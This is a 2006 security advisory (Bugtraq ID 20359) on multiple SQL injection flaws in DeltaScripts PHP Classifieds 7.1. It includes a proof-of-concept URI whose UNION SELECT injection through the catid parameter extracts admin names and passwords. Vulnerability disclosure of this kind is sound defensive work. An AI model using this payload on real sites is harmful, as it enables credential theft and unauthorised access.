PHP Classifieds CatID Parameter Multiple SQL Injection Vulnerabilities
BID:20359
Info
PHP Classifieds CatID Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 20359 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 05 2006 12:00AM |
| Updated: | Oct 05 2006 09:05PM |
| Credit: | Kzar is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
DeltaScripts PHP Classifieds 7.1 |
| Not Vulnerable: | |
Discussion
PHP Classifieds CatID Parameter Multiple SQL Injection Vulnerabilities
PHP Classifieds is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
PHP Classifieds is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Exploit / POC
PHP Classifieds CatID Parameter Multiple SQL Injection Vulnerabilities
Attackers can exploit these issues via a web client.
The following proof-of-concept URI has been provided:
http://www.example.com/index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins
Attackers can exploit these issues via a web client.
The following proof-of-concept URI has been provided:
http://www.example.com/index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins
Solution / Fix
PHP Classifieds CatID Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
PHP Classifieds CatID Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- PHP Classifieds Homepage (Delta Scripts)